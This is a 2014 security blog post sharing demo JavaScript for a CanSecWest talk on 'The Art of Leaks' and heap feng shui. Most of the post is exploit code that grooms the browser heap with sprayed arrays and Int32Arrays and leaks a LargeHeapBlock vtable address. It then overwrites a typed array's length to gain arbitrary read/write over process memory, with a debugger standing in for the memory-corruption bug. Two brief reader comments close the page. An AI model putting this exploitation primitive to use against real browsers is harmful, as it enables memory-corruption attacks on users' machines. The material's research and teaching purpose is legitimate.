The Art of Leaks: The Return of Heap Feng Shui(demo code)

Thanks ga1ois give us a very excellent lecture about the Art of Leaks in the consecwest. He found this way can read/write any memory of the process. Cool!

And I upload the ppt here!The+Art+of+Leaks+-+read+version+-+Yoyo

also you can download the ppt from his github.
https://github.com/ga1ois/CanSecWest2014/blob/master/The Art of Leaks – read version – Yoyo.pdf

Now I write some demo codes here :)

var k = 0;
var int32buf;
var heaparr = new Array();

//LargeHeapBlock
while(k<0x200)
{
heaparr[k] = new Array(0x3c00);
if (k == 0x80)
{
int32buf = new ArrayBuffer(0x68);
}
for (var index = 0;index< 0x3c00; index++)
{
heaparr[k][index] = 0x41424344;
}
k += 1;
}
//Now we allocate the Int32Array
while(k<0x400+0x200)
{
heaparr[k] = new Array(0x3bf8);
for (var index = 0; index< 0x55; index ++)
{
//0x55*0x400 = 0x1000
heaparr[k][index] = new Int32Array(int32buf);
}
k += 1
}

//we update the count manually.
//we also can use a vulnerability inc [] or dec [] .etc to achive this.
alert("Now we attach the windbg(eb 0c0af01b 0x05) update the count value");

var j =0;
var i =0;
var flag = 0;

//to find the arr which we change the count
for (j =0x200; j < 0x400+0x200; j ++)
{
for (i =0; i < 0x55; i ++)
{
if (heaparr[j][i].length>0x1a)
{
tmp_length = heaparr[j][i].length;
flag = 1;
alert(tmp_length.toString(16));
break;
}
}
if (flag == 1) break;
}

//we get the vt address about the LargeHeapBlock
var vt_addr = heaparr[j][i][0x2f];

//we get the int32buf address
var int32buf_addr = vt_addr - 0x68 - 0x8 - 0x10;

//Now we get the offset
var offset = (0x0c0af000-int32buf_addr)/4;
//we change the count secondly times.
heaparr[j][i][offset+6] = 0x20000000;
heaparr[j][i][offset+7] = 0x00000000;

alert("Now the 0c0af000 object have update the count the the buffer pointer");
alert(heaparr[j][i].length.toString(16)); //Now we can see length is changed to 0x20000000

alert("Now we can use heaparr[j][i] to access the whole memory");
heaparr[j][i][0x0c0af000/4] = 0x41414141; //we write the vtable.
alert(heaparr[j][i][0x0c0af000/4].toString(16)); //we read the vtable :)

  

现有 2 条评论

  1. cvrock 2014/05/23 am 9:51

    Hello, the rss link is broken, may you please fix it?
    http://www.secniu.com/blog/feed/

    Reply
  2. am 2014/03/28 pm 7:07

    Any video of the presentation so we can understand this code better? or a whitepaper?

    Thanks!

    Reply

发表评论

带 * 的是必填项目,电子邮件地址不会被公开。
文字的交流也是情感的交流,技能的交流也是学术的交流。

Are you human? Click the Apple...